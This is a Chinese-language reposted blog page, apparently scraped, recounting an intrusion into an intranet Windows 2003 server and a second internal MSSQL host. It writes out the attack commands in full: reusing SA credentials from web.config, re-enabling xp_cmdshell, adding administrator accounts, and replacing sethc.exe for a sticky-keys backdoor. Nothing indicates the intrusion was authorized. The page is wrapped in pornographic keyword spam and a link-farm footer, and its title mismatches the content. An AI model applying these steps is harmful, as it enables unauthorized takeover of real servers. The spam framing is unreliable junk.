日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析

發布時間:2025/3/15 linux 18 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

圖文:udb311

主題:MSSQL內網滲透案例分析

發表:黑白前線

描述:對于內網滲透技術一直感覺很神秘,手中正巧有一個webshell是內網服務器。借此機會練習下內網入侵滲透技術!本文敏感信息以屏蔽!密碼都以*號代替。此次過程主要運用到xp_cmdshell恢復與執行,再通過自己的靈活思維運用。

環境:2003 SERVER

IIS :6.0 支持php

數據庫:MSSQL和MYSQL

網站類型:ASPX

本文重點講述內網滲透提權部分,對于WEBSHELL不在描述。對于了解入侵滲透的朋友都知道,拿到webshell后服務器能否提權就要先找提權 的漏洞所在。從本站的角度來看,存在MSSQL、MYSQL支持ASPX和PHP可以說權限夠大的了。先來看看目錄能窮舉出來哪些東西。先看程序目錄,很 平常么。沒現有SU和MYSQL之類的信息。

E:盤可以瀏覽

F:盤可以瀏覽

本站ASPX 類型網站,使用的是MSSQL數據庫。顯示密碼不是最高權限的用戶,就是是個DB用戶提權也不能馬上到手。

再翻翻別的站點,目錄可以瀏覽一個個找吧。發現一個目錄web.config有SA用戶

連接數據庫信息:

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打開aspxspy,使用database連接功能。

登錄成功,顯示SA看來應該沒有降權。

連接狀態是MSSQL 2005,要先啟xp_cmdshell.

接著執行下命令"whoami.html' target='_blank'>whoami"

good,system 權限,下面就是添加一個賬號了。。

Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否開啟

Exec master.dbo.xp_cmdshell 'stat.html' target='_blank'>netstat -ano'

OK,狀態正常。

Exec master.dbo.xp_cmdshell 'ipconfig /all'顯示配置是內網IP

通過域名解析到的IP連接3389,可以連接。

說明管理做了端口映射,這就不要轉發端口了。省了很多功夫!

這才拿到了一臺服務器的權限,從網站的SQL連接上不難發現內網還有SQL服務器。

滲透繼續……

內網IP為200,同樣是MSSQL SA權限。

再利用aspxspy 數據庫連接,

郁悶的事情發生了,不能連接。

[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒絕訪問。

按道理講數據庫能使用的情況下應該可以成功連接上的,難道沒有配置TCP/IP訪問數據庫?疑問產生了,無耐之下通過3389上到服務器上來試試。服務器安裝了MSSQL,有查詢分析器和企業管理器。這又成了我們的工具。呵呵!

SQL分析器連接之,仍然無法連接。

先測試下所在的MSSQL服務器機器的存在性。

成功響應,說明服務器存在。

運行mstsc試著3389連接下,顯示了一個xp的界面。比較郁悶耶。

試下名稱解析服務。。。

點擊瀏覽一看,這么多MSSQL服務器名還真不知道哪臺是的。觀察下發現200和IP200的機器有些相近。輸入SA及密碼。

成功返回查詢窗口。試下xp_cmdshell

發現不存在,恢復之

Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

OK!

執行命令"whoami",雖然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系統錯誤。不是沒權限添加。。。。不明真像了。。。

思路:開了3389可以用sethc.exe 替換來。。。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替換之?

問題又來了,提示磁盤文件不足。

利用xp_dirtree查看下C盤

EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目錄,刪除一個數據庫的備份

再執行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一個文件被復制,說明成功。3389 5次shift未彈出。

再試下

exec xp_cmdshell 'net user 123 123 /add' 提示成功。原來開始是空間不足導致的系統錯誤啊。真像揭開!

exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登錄之。。

exec xp_cmdshell 'net user 123 /del'刪除用戶

內網還存在很多機器,此次滲透就此結束。。。

總結:內網從端口轉發到外部連接,再從3389登錄內部3389 跟跳板技術差不多。

總結

以上是生活随笔為你收集整理的内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: av五月| 国产精品国产精品国产专区不片 | 五月天六月色 | 欧美视频亚洲视频 | 久久国产精品无码一区二区 | 欧亚成人av | 日韩在线观看视频一区 | 韩国美女一区 | 日本亲与子乱xxx | 蜜桃香蕉视频 | 欧美日韩在线免费视频 | 欧美日韩一区二区三区视频 | 超碰超碰超碰超碰 | 99热网 | 欧美一区二区三区久久精品 | 久久久精品人妻一区二区三区色秀 | 中文字幕伊人 | 欧美一区二区三区粗大 | 久久黄色免费网站 | 日本福利一区 | 777精品久无码人妻蜜桃 | 久久久麻豆 | 亚洲久操 | 性综艺节目av在线播放 | 在线免费观看国产视频 | 美女网站视频在线观看 | 日本丰满少妇一区二区三区 | 狠狠干伊人网 | 成人乱人乱一区二区三区一级视频 | av解说在线观看 | 日韩插 | 扒开女人屁股进去 | 亚洲色图欧美色 | 福利视频在线看 | 国产精品4 | 在线观看特色大片免费网站 | 久久成人乱码欧美精品一区二区 | 国产黄色电影 | 午夜国产福利在线观看 | 台湾av在线播放 | 短裙公车被强好爽h吃奶视频 | 五月天视频网 | 网站在线播放 | 在线观看国产91 | 国产精品无码免费在线观看 | 亚洲天堂成人在线 | 男人天堂2021 | 九九热精品在线 | 免费一级黄色 | 国产精品无码中文字幕 | 怡红院成永久免费人全部视频 | 一区二区三区免费高清视频 | 有码在线 | 亚洲第一毛片 | 久久国产精品系列 | 丰满大爆乳波霸奶 | 极品色影视 | 人妻少妇精品一区二区 | 精品一区二区三区久久 | 一本色道久久亚洲综合精品蜜桃 | 一区欧美 | 美女涩涩视频 | 四虎国产精品成人免费入口 | 久久白浆 | 精久久久久久久 | 一区在线观看 | 欧美性爱视频久久 | 精品日韩在线播放 | 男生和女生一起差差差很痛的视频 | 韩日在线| 岛国在线视频 | 生活片毛片 | 亚洲图片另类小说 | 嫩草av久久伊人妇女超级a | 青青青青青青青青草 | 亚洲精品一区二区18漫画 | 久久久精品麻豆 | 国产高清免费观看 | 成人娱乐网 | 成年人久久 | 亚洲一区h| 人妻丰满熟妇av无码区不卡 | 亚洲欧美综合自拍 | 久久国产亚洲 | 500福利视频导航 | 好吊色视频一区二区三区 | 成年人在线观看 | 亚洲福利视频网 | a国产精品| 韩国精品在线观看 | 天天插日日插 | 奇米影视一区二区三区 | 李华月全部毛片 | 九九综合久久 | 亚洲春色在线观看 | 国产精品电影网站 | 伊人春色在线视频 | 亚洲精品尤物 | 汗汗视频 |